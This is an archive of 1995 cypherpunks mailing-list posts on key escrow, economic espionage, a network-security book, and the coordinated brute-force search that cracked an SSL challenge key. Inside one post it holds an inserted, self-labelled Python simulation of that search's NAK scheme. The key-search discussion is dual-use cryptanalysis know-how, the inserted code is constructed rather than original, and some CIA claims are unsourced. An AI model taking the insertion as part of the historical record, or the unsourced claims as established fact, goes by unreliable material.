those nasty French Spy Agency persons?  (Clinton being who he is,
I'd expect him to say a politically correct version of the latter, 
whether he means the former or not, just like his predecessor.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 17:18:04 PDT
To: cypherpunks@toad.com
Subject: Re: Is the book Network Security any good?
Message-ID: <9509201546335370@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 95 22:53:49 -0400
From: hallam@w3.org


>Has anyone read the book "Network Security Private Communication in a 
>PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
>Speciner, and has a copyright date of this year.

It's pretty good on security and structure of protocols. Makes a good companion 
the Schneier book. I use it frequently.

It does have some very irritating assertions concerning ASN.1 however, 
specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1
to be far superior than the alternative suggested which is pure lossage. 
Lambasting the use of ASN.1 is fair game but arguments over wasted bytes miss t
point of ASN.1 and the BER encoding entirely.

It would make a useful course book. 

        Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 31 Aug 95 02:58:25 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <199508310955.CAA19393@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 8/30/95 -0500, you wrote:
> In =any= Key Escrow arrangement (including the non-government variety 
> preferred by 4 out of 5 Cypherpunks in a recent survey) 
> there must be a division between encryption keys and signature keys.
....
> Please don't mention to anyone the fact that my signature key can be
> used to send me something that even the escrow agents can't read....

Only if you use RSA.  One of the neat things about RSA, as opposed to DH or 
DSA/DSS, is that the same algorithm can do both signature and encryption.

Once we all have our Gummint-issue Citizen-Unit SmartCards with the
Web-Of-Mistrust Hierarchical Certification System, 
people won't be able to use the DSS feature to send you encrypted messages 
        <fnord>Pay no attention to that man behind the subliminal
channel!</fnord>
but you can still use them for signatures, including checking escrow agency 
signatures on your privacy key.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 16:27:05 PDT
To: cypherpunks@toad.com
Subject: [COMP.SECURITY.UNIX] ADVICE ON PASSWORD SECURITY GUIDELINES
Message-ID: <9509201546345375@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 20:55:24 -0700
To: cypherpunks@toad.com
From: alano@teleport.com (Alan Olsen) (by way of Alan Olsen <alano@teleport.com
Subject: [comp.security.unix] Advice on password security guidelines

I found this on alt.humor.best-of.usenet.  It seemed like something that
would be appreciated here.  (And it is not that far off topic.)

Enjoy!

-----------------------------------------------------------

In alt.humor.best-of-usenet, Artur Pioro <artur@thp2.if.uj.edu.pl>
wrote:

>From: Paul Ashton <paul@argo.demon.co.uk>
>Newsgroups: comp.security.unix
>Subject: Advice on password security guidelines

>Hi,
>my boss has asked me for comments and improvements on his new password
>security policy. To me, it seems a bit severe. If anyone can offer any
>additional suggestions please do, here goes...

>For immediate issue:
>Password changing guidelines V2.2b

>Due to new security policies, the following guidelines have
>been issued to assist in choosing new passwords. Please follow
>them closely.

>Passwords must conform to at least 21 of the following attributes.

>1.  Minimum length 8 characters
>2.  Not in any dictionary.
>3.  No word or phrase bearing any connection to the holder.
>4.  Containing no characters in the ASCII character set.
>5.  No characters typeable on a Sun type 5 keyboard
>6.  No subset of one character or more must have appeared on
>    Usenet news, /dev/mem, rand(3), or the King James bible (version 0.1alpha)
>7.  Must be quantum theoretically secure, i.e. must automatically change
>    if observed (to protect against net sniffing).
>8.  Binary representation must not contain any of the sequences 00 01 10 11,
>    commonly known about in hacker circles.
>9.  Be provably different from all other passwords on the internet.
>10. Not be representable in any human language or written script.
>11. Colour passwords must use a minimum 32 bit palette.
>12. Changed prior to every use.
>13. Resistant to revelation under threat of physical violence.
>14. Contain tissue samples of at least 3 vital organs.
>15. Incontrovertible by OJ Simpson's lawyers.
>16. Undecodable by virtue of application of 0 way hash function.
>17. Odourless, silent, invisible, tasteless, weightless, shapeless, lacking
>    form and inert.
>18. Contain non-linear random S-boxes (without a backdoor).
>19. Self-escrowable to enable authorities to capture kiddie-porn people
>    and baddies but not the goodies ("but we'll only decode it with a
>    court order, honest").
>20. Not decryptable by exhaustive application of possible one time pads.

>Due to the severity of the restrictions, if the password is entered
>incorrectly 3 times at login time, you will be asked if you would like to
>pick a new one.

>Please add guidelines to the above and adjust the minimum conformation
>requirement, if applicable.

>--
>Moderators accept or reject articles based solely on the criteria posted
>in the Frequently Asked Questions. Article content is the responsibility
>of the submitter.  Submit articles to ahbou-sub@acpub.duke.edu. To write 
>to the moderators, send mail to ahbou-mod@acpub.duke.edu. 



|         Spam is the Devil's toothpaste!         | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Shamrock@netcom.com)
Date: Wed, 20 Sep 95 16:29:25 PDT
To: cypherpunks@toad.com
Subject: RE: NIST KEY ESCROW MEETING
Message-ID: <9509201546335369@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 19:58:52 -0800
To: cypherpunks@toad.com
From: shamrock@netcom.com (Lucky Green)
Subject: Re: NIST Key Escrow meeting

At 7:51 8/30/95, Flame Remailer wrote:
>Subject: NIST Key Escrow Meeting Discussion Papers
>
>Key Escrow Issues Meeting, September 6-7, 1995
>Discussion Paper #1

[Old and new GAK requirements elided]
>With your input, we are hopeful that this effort will lead to
>definitive criteria, which will facilitate the development of
>exportable products and help minimize the time required to obtain
>export licenses.  The Administration seeks to finalize such
>criteria and make formal conforming modifications to the export
>regulations before the end of 1995.
>
>
>Note:  These issues will be discussed at the Key Escrow Issues
>Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
>the National Institute of Standards and Technology (Gaithersburg,
>Maryland).  The meeting will be open to the public, although
>seating is limited.  Advance registration is requested, please
>contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
>mail: carlton@micf.nist.gov.

Will any Cypherpunks attend this meeting? I sure hope we get to make our
ideas known.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 01:08:58 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: Is the book Network Security any good?
In-Reply-To: <9508310053.AA01365@cantina.verity.com>
Message-ID: <199508310807.EAA24230@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> Has anyone read the book "Network Security Private Communication in a 
> PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
> Speciner, and has a copyright date of this year.
> 
> Is it good?  What's the level?

I know Charlie a bit and have met Radia and they are both quite
smart. Word from third parties is that the book is good. I haven't
read it myself, though.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 01:17:56 PDT
To: hallam@w3.org
Subject: Re: Is the book Network Security any good?
In-Reply-To: <9508310253.AA09578@zorch.w3.org>
Message-ID: <199508310817.EAA24257@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> It does have some very irritating assertions concerning ASN.1
> however, specifically concerning its use in Kerberos. I consider
> Kerberos's use of ASN.1 to be far superior to the alternative
> suggested which is pure lossage.

I've heard people associated with the decision to use ASN.1 in
Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight
which should be exterminated from the planet.

But we agree that the book in question is mostly good...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 30 Aug 95 18:26:14 PDT
To: jya@pipeline.com
Subject: Re: CIA & Espionage
In-Reply-To: <199508301721.NAA10401@pipe4.nyc.pipeline.com>
Message-ID: <199508310125.EAA14438@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> >It was said that Pres. Clinton had given a speech while 
> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
> >said in this speech that obtaining  industrial 
> >informations has the highest priority and this were the 
> >new  task for the spies.

There was a fairly large article about this in Helsingin Sanomat, the
largest newspaper in Finland, some weeks ago.  It was quoted as being
originally from the New York Times.  (I have the clip saved at home
and can check the date if anyone is interested.)

I do find it rather shocking that the most powerful country in the
world sets industrial espionage as the primary task of their
intelligence services.

Now talking about those crypto restrictions worldwide and the real
reasons why the United States is driving them...

    Tatu Ylonen <ylo@cs.hut.fi>

--
International Cryptography Pages - check http://www.cs.hut.fi/ssh/crypto




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 31 Aug 95 01:28:00 PDT
To: cypherpunks@toad.com
Subject: Re: C2.ORG REMAILER
Message-ID: <9508310827.AA04419@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Sorry for my last empty message, it's late & I confused
the "deliver" icon with the "mail format" icon (I was
attempting to change the type from NeXTmail to plain text)

I don't see why an anonymous remailer can't be set up in
some country with an inet connection, but with little
respect for idiocy originating from other countries
& in particular the US.

A lot of that issue is treaty dependent and that's probably what
people should look at. I like what people are doing well
enough, don't get me wrong. But the vulnerability exists via
co-operative law enforcement arrangements & legal venue operations.
That's the stuff of treaties. I think probably an appropriate
place could be found & arranged with some effort at this point.

Hell there's GOT to be some countries out there that would have
little respect for the antics of the Church 'o Bucks who'd be
interested in it.

Stick the database on an encrypted partition, and arrange
a two party setup on the keys & administration and it'd make
them a damn bit harder to retrieve anyhow... "I'd comply,
but I don't have the keys, and the keyholder is refusing
contact. And NO I don't know his 'True Name' and can't find him."
That'd make things a tad rough, and isn't illegal anyplace
that I'm aware of.

Call it "Applied Stenography" (Sorry about the pun, but I couldn't
resist it :>



Tim Scanlon




________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (Monty.harder@famend.com)
Date: Wed, 20 Sep 95 16:28:06 PDT
To: cypherpunks@toad.com
Subject: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <9509201546395394@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 30 Aug 95 23:50:00 -0500
Organization: The First Amendment BBS


  Regardless of whether Ito allows the tapes into evidence, the public
has heard a LEO matter-of-factly discussing the fabrication of evidence
against US citizens. We should take advantage of this, by connecting the
Fuhrman/Good Ole Boys from BFART bit, and GACK.

  If my private key must be escrowed with Lawn Forcement Agencies, the
very real possibility exists of a Fuhrman using it to forge evidence
against me. In =any= Key Escrow arrangement (including the non-
government variety preferred by 4 out of 5 Cypherpunks in a recent
survey) there must be a division between encryption keys and signature
keys.

  I recommend that anyone who will be using escrowed keys generate two
pairs: First, the signature key, including in the userid some kind of
[sig use] identifier (we should settle on a standard abbreviation for
this) followed by the encryption key. This way, when a person gets your
pubkeys, they get the encryption key =last=, which gets it searched
first whenever they PGP -e... something.

  Whatever arrangements are made for escrowing my encryption key,
=nobody= gets my signature key. If I am fired, quit, become brain
damaged or dead, my key can never be used by anyone to implicate me in
any criminal activity.



  Please don't mention to anyone the fact that my signature key can be
used to send me something that even the escrow agents can't read....






 *  
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 31 Aug 95 01:55:07 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Economic Espionage?
In-Reply-To: <ac6a9205000210049586@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950831032944.29233A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Timothy C. May wrote:

> Date: Wed, 30 Aug 1995 22:22:13 -0700
> From: Timothy C. May <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Economic Espionage?
> 
> At 1:25 AM 8/31/95, Tatu Ylonen wrote:
> >> >It was said that Pres. Clinton had given a speech while
> >> >visiting the  CIA HQ in Langley/Virginia. He allegedly
> >> >said in this speech that obtaining  industrial
> >> >informations has the highest priority and this were the
> >> >new  task for the spies.
> >
> >There was a fairly large article about this in Helsingin Sanomat, the
> >largest newspaper in Finland, some weeks ago.  It was quoted as being
> >originally from the New York Times.  (I have the clip saved at home
> >and can check the date if anyone is interested.)
> >
> >I do find it rather shocking that the most powerful country in the
> >world sets industrial espionage as the primary task of their
> >intelligence services.
> 
> What confirmation can you give us for this statement?

Primary task is indeed a bit of a stretch, but published and 
unpublished sources are floating about that it has become more of a 
focus.  You don't need an insider tip for that.

> 
> I'd like to see the actual comments, not just second-hand reports.
>

I've seen now three clippings posted or mentioned on the list.  Two with 
quotes.  This is hardly new.  It's been done and accepted in the 
intelligence community for quite some time.  It's getting press because 
it's new and trendy- and to some degree because there's an increased 
emphasis in the last few years.

> The issue of economic surveillance has come up several times, and I know of
> no formal policy to institute such a program.

A formal policy has existed at CIA for over 2 years (I don't know how 
much over 2 years) now to collect industrial espionage and there is even a
desk which co-ordinates it.  I'll send you (in private e-mail) a name of an
attorney at CIA who will probably talk with you about the subject.  He's about
as open as CIA gets.

> The U.S., with generally
> multiple competitors in each market, would have a hard time figuring out
> who to tell "foreign secrets" to. Would Ford be told? Or just General
> Motors?

C'mon Mr. May.  We both know that that's hardly a hard decision.  Ford 
has been so cooperative with our endeavors of late, they will get the 
information way before GM will.

Seriously, what makes you think this is any less a political decision 
than the question of who to spy on?  You can't honestly believe that CIA 
or any other intelligence agency cares much about the equity of giving 
information to some parties and not others?  The information will go to 
who is currently on the "in" list, and those who are unlikely to spread 
the source of the sudden rash of contract bid victories.  Large U.S. 
corporations would do well to try to align themselves with the 
intelligence communities if they do much bidding against foreign firms.  

Try talking to the business intelligence people (who regularly debrief 
U.S. businessmen returning from foreign countries on a volunteer basis.)

If you play it right, my attorney friend will probably tell you a bit 
about the program.  Of course, I would appreciate it if you failed to 
mention me, though I doubt he'd know who "Black Unicorn" was anyhow.  
(Justification for pseudonyms 'punks)

>What about companies with operations in multiple countries?

Depends on:

1. The amount of espionage activity in a given country.
2. The amount of cooperation between CIA and the company in question.

> 
> Former DIRNSA (Director of the NSA) William Odom has said repeatedly that
> economic espionage cannot plausibly be a central task of the NSA.
> 

Mostly because the NSA's primary goal is large scale sigint and cryptography 
and these are less useful than humint in industrial espionage. 

C'mon Mr. May, this is basic divide and deny / plausible deniability 
here.  Since the NSA doesn't make it a central task, none of the 
intelligence agencies do?

(I'm constructing humint to include installing a tap on a single phone 
outside the negotiating room and such.)  These are not tasks for the NSA but
for an agency with extensive field operatives and flexibility, which the NSA 
lacks.  Also note that the NSA is so heavily geared for diplomatic 
interception.

I think this list suffers a great deal from its arrogance in assuming 
the NSA is really as interested in U.S. citizens as the list would
like to suppose.  NSA makes a wonderful threat model, but like all good threat
models, it is at the extreme to very extreme end.  Does the NSA cooperate 
with federal law enforcement and other domestic activities?   Sure.  Is it 
more than a side project here and there - not really.  Does it care much 
about Industrial Espionage?  Not unless the CIA asks for sigint on 
industrial targets.

> Before anyone accuses me of being an apologist for the NSA (usually these
> claims arrive anonymously),

I won't, but they seem to have thrown you for a loop through a 
combination of an over-estimation on your part of their function and 
an over-extending of the reach of their denial.

> I've been looking for evidence of an economic
> intelligence role or mission of the U.S. intelligence agencies for more
> than 7 years.

You've been looking too early, and when you've looked early, you've 
looked for too big.  When was the last intelligence SUCCESS you have 
read about?  They don't do everything wrong.  In any event, no one 
thought it was a good idea (on a major scale anyhow) up to a pair of years ago
or so.  Bush proposed it at one time casually and was dealt a backhand 
rather quickly.  I remember an article in the NYT about it written back 
just before he left CIA.  Of course this really meant that they had been doing
more and more of it and were looking to cover even more significant 
activities.  Japan was the trendy target then.

I suggest you concentrate your interest on the business intelligence 
program which has been talking to U.S. businessmen who travel abroad for 
some 10 years, and really upped the ante these last two.  Look also at 
documents listed in "Former Secrets:  Government Records Made Public 
Through the Freedom of Information Act."  (E. Hendricks)  or "Center for 
National Security Studies, From Official Files: Abstracts of Documents on 
National Security and Civil Liberties."  A great resource is also the 
National Security Archive in Washington, D.C.  (Scott Armstrong of the 
Washington Post is a co-founder)

The sugar industry is another nice place to take a look.

> 
> Let's see some evidence.
>

Ask yourself which companies have close relations with the CIA in 
past/present.

IBM. (duh)

AT&T.  (Check the connection with the recently floundering Mexican 
Telecom companies).  See _U.S. v. American Telephone and Telegraph Co._,
551 F.2d 384 (1976);  _U.S. v. (AT&T)_, 567 F.2d 121 (1977) for a nice idea
of the long term relationship between AT&T and CIA. 

e-systems wins contracts all the time.  Look there.  They're publicly 
held, ask for a prospectus and see what public foreign contracts they've 
announced of late.  There's your starting list of past industrial espionage 
targets.

It's not all that hard.  95% of intelligence information is 
available publicly, and maybe 10% of it is available in the newspapers.  



> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 31 Aug 95 04:24:22 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attack
Message-ID: <199508311118.FAA00515@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
>So T.C.May is the same person as "Lance"?
Hey, I wanna be Lance tooooooo. Can I be Lance? Can I?


From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>

>Each client could pick a segment at random, check it and then broadcast
>a NAK. Other clients would then know that the segment in question has
>been done, and avoid picking it in the future. If you are worried about

That opens it wide open to someone NAKing the keyspace where the key is.
If we're going to involve a server, might as well do the sequential job
and make it fast.


From: monty.harder@famend.com (MONTY HARDER)

TC> * For opportunistic attacks on keys in challenges, the odds are 95% that a
TC> key will be found with only twice the total effort (or time) using a
TC> totally random method of picking up keyspace to search.

>  The odds can be improved somewhat by scaling the granularity of the
>sweep to the size of the sweep. (Align larger chunks on large-chunk
>boundaries, eliminating the chance of overlap with other large chunks.)

Some kind of step (ie, round-down) function performed on the random (I
vote we call it a dart) output, with the size of the step based on how
many segments at once you want to search? Seems to me that all you're doing 
is searching an X segment area around where the dart hit. In order to
get any kind of boundary, you have to scale the allowed segment blocks, by 
powers of two, for example, or something, so everyone knows where the 
borders are. It's a nice thought but I don't see that it's necessary.

If, on the other hand, sequential searchers plow through half of the
keyspace while a "random crew" throws darts at the other half, everyone
can participate how they wish. And if the keyserver gets deep-six'd by a
Denial of Service attack (or just swamped), everyone can just switch into
random mode and shotgun the keyspace. (Maybe even avoiding what's already 
been sequentially-searched)

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEWZ6MLa+QKZS485AQGg3AMApFhrOBURkmwJQ699IkBhlZao6ynLe4pW
8eJllDAutliFdzGWA/PYHrfYsO8Dl9IOYrzFCmdNJY5urON3/IeOv5eEGqGkc/N6
3ZaKR4FIBk8jk0u6QGxi/iRfPfSa62gp
=it70
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
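
Added example, not part of Don's message or of the brute-search project's code: a small simulation of the serverless scheme quoted above, where clients pick random segments and broadcast a NAK for each one searched without finding the key. It shows why a single unverified NAK on the key-bearing segment ends the search unsuccessfully, and how requiring NAKs from two distinct clients before retiring a segment restores the result at the cost of extra work. The names `NakBoard` and `run_search`, the client ids and the segment counts are all constructed for this illustration.

```python
import random


class NakBoard:
    """Shared record of segments that clients have reported as 'searched, no key'."""

    def __init__(self, num_segments, confirmations_needed):
        self.num_segments = num_segments
        self.needed = confirmations_needed
        self.naks = {}  # segment number -> set of client ids that NAKed it

    def report_nak(self, client_id, segment):
        self.naks.setdefault(segment, set()).add(client_id)

    def retired(self, segment):
        # A segment is skipped by everyone once enough distinct clients NAKed it.
        return len(self.naks.get(segment, ())) >= self.needed

    def open_segments(self, client_id):
        # Segments still worth searching for this client: not retired, and
        # not already searched (NAKed) by this same client.
        return [s for s in range(self.num_segments)
                if not self.retired(s)
                and client_id not in self.naks.get(s, ())]


def run_search(num_segments, key_segment, honest_clients, false_naks,
               confirmations_needed, seed=0):
    """Simulate the random-pick search.

    false_naks is a list of (client_id, segment) reports made WITHOUT the
    segment having been searched (a lying or buggy client).
    Returns (key_found, segments_actually_searched).
    """
    board = NakBoard(num_segments, confirmations_needed)
    for client_id, segment in false_naks:
        board.report_nak(client_id, segment)

    rng = random.Random(seed)
    searched = 0
    while True:
        progressed = False
        for client_id in honest_clients:
            candidates = board.open_segments(client_id)
            if not candidates:
                continue
            segment = rng.choice(candidates)
            searched += 1
            progressed = True
            if segment == key_segment:
                return True, searched
            board.report_nak(client_id, segment)
        if not progressed:
            # Every segment is retired or already searched by each client.
            return False, searched


if __name__ == "__main__":
    clients = ["a", "b", "c"]              # constructed honest clients
    bogus = [("mallory", 11)]              # constructed false NAK on the key segment
    print("trust one NAK: ", run_search(16, 11, clients, bogus, 1, seed=1))
    print("need two NAKs: ", run_search(16, 11, clients, bogus, 2, seed=1))
    print("no false NAKs: ", run_search(16, 11, clients, [], 1, seed=1))
```

Requiring k distinct NAKs tolerates at most k-1 false reporters and multiplies the worst-case work by k, which is the trade-off behind the suggestion to let a server hand out segments instead.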




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:55:13 PDT
To: cypherpunks@toad.com
Subject: ECONOMIC ESPIONAGE?
Message-ID: <9509201546345376@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 22:22:13 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Economic Espionage?

At 1:25 AM 8/31/95, Tatu Ylonen wrote:
>> >It was said that Pres. Clinton had given a speech while
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly
>> >said in this speech that obtaining  industrial
>> >informations has the highest priority and this were the
>> >new  task for the spies.
>
>There was a fairly large article about this in Helsingin Sanomat, the
>largest newspaper in Finland, some weeks ago.  It was quoted as being
>originally from the New York Times.  (I have the clip saved at home
>and can check the date if anyone is interested.)
>
>I do find it rather shocking that the most powerful country in the
>world sets industrial espionage as the primary task of their
>intelligence services.

What confirmation can you give us for this statement?

I'd like to see the actual comments, not just second-hand reports.

The issue of economic surveillance has come up several times, and I know of
no formal policy to institute such a program. The U.S., with generally
multiple competitors in each market, would have a hard time figuring out
who to tell "foreign secrets" to. Would Ford be told? Or just General
Motors? What about companies with operations in multiple countries?

Former DIRNSA (Director of the NSA) William Odom has said repeatedly that
economic espionage cannot plausibly be a central task of the NSA.

Before anyone accuses me of being an apologist for the NSA (usually these
claims arrive anonymously), I've been looking for evidence of an economic
intelligence role or mission of the U.S. intelligence agencies for more
than 7 years.

Let's see some evidence.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: piete.brooks@cl.cam.ac.uk (Piete.brooks@cl.cam.ac.uk)
Date: Wed, 20 Sep 95 16:55:46 PDT
To: cypherpunks@toad.com
Subject: Article in the Guardian (UK) about Hal2 not bad ....
Message-ID: <9509201546385387@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 31 Aug 1995 08:00:07 +0100
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>

An article by Azeem Azhar on page three of today's "The Guardian Online"
(he tells me it is available only in paper form !) is fairly positive.
He puts over the main point: "since US government regulations prevent the
export of software that uses stronger cryptographic techniques".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 30 Aug 95 23:35:47 PDT
To: don@cs.byu.edu
Subject: Re: SSL search attack
In-Reply-To: <199508302142.PAA00178@wero>
Message-ID: <"swan.cl.cam.:108150:950831063347"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Problem is, though, if *each* segment is shuffled, or shuffled in groups
> of 10 or 25 or 50 or what? brutessl is designed for sequential search
> through a block of segments. I was pulling down blocks of up to 40 segments 
> each, for each machine I was running. Of course, with brloop running I
> won't be in such a bind (I have yet to see that it really works though..)
> but still it also represents a coding problem as to handing out sequential
> segments within shuffled blocks.

My view is that IFF this becomes a problem, I'll do something to fix it.
I can do it in the server (under my control) after a complete scan has been
completed without finding the key.

It may mean you only get smaller blocks, but IFF we get that far, tough !

> Hey, by the way Piete, is there gonna be a ego list (rankings) like there
> was with the RC4? 

Err -- look on http://www.brute.cl.cam.ac.uk/brute/ -- follow CRACKED and then
look at:

	Credits are available as plain text and as a table (needs a browser
	which supports tables !).

"plain text" is <PRE> while "table" needs a fancy browser.


PS: I am working on beloop and brclient still, based on comments.
    brclient now uses early binding on the project, reducing traffic.
    brloop now has -h and -i flags, and a "-a" flag to create a .brloop.rc
    If allowed, it will log allocated and ACKed keys
    I have a "Local CPU Farm" slave server available
    Kevin <kwang@blackbox.punk.net> is working on a central server to "rsh"
	work to local CPUs.
    I am against pre-fetching of the next chunk, as I believe it should not be
	necessary (I'll review that after Hal3) and it tends to increase NOACKs


BTW: you make the 1% (of the TOTAL keyspace) cut :-)

              Credits for the CRACK of Hal's Second Challenge (plain) (p1 of 3)

            CREDITS FOR THE CRACK OF HAL'S SECOND CHALLENGE (PLAIN)

   Note that thet %age is the percentage of the complete address space.

   This data is also available as a table for users with a suitable
   browser.

%age  ACKs NoAs ACK/n ID
===== ==== ==== ===== ======================
8.498 5569 1572 0.780 jshekter@alias.com
2.182 1430  454 0.759 pjw@dcs.ed.ac.uk
1.892 1240    8 0.994 jelson@jhu.edu
1.587 1040  386 0.729 martin@mrrl.lut.ac.uk
1.437  942  412 0.696 bal@mit.edu
1.375  901    0 1.000 rkel02@cs.auckland.ac.nz
1.367  896   51 0.946 nathanw@mit.edu
1.294  848  567 0.599 cwe@it.kth.se
1.083  710  879 0.447 floeff@mathematik.uni-stuttgart.de
1.044  684   42 0.942 aba@dcs.ex.ac.uk
1.025  672    0 1.000 bande@lut.fi
1.003  657  214 0.754 don@cs.byu.edu
0.891  584  254 0.697 droelke@aud.alcatel.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 31 Aug 95 00:00:51 PDT
To: cypherpunks@toad.com
Subject: Article in the Guardian (UK) about Hal2 not bad ....
Message-ID: <"swan.cl.cam.:114490:950831070035"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


An article by Azeem Azhar on page three of today's "The Guardian Online"
(he tells me it is available only in paper form !) is fairly positive.
He puts over the main point: "since US government regulations prevent the
export of software that uses stronger cryptographic techniques".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 31 Aug 95 08:49:59 PDT
To: cypherpunks@toad.com
Subject: Some details on RSA Secure
Message-ID: <9507318098.AA809884265@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are my biased comments on RSA Secure.  They are biased by
the fact that I am a techie who works for RSA Data Security.

Neatest Features:
- It is integrated with the File Manager on Windows and the
  Finder on Mac System 7.
    For example, from the file manager you can double click on
  an encrypted Excel spread sheet and the file will automatically
  decrypt and launch Excel.  The decryption can be automatic
  because the file manager hangs on to your password for a settable
  number of minutes.

- A settable list of files can be automatically decrypted (or
  encrypted) on system startup (or shutdown).

Technical Features:
- The random number generator for file encryption keys and public
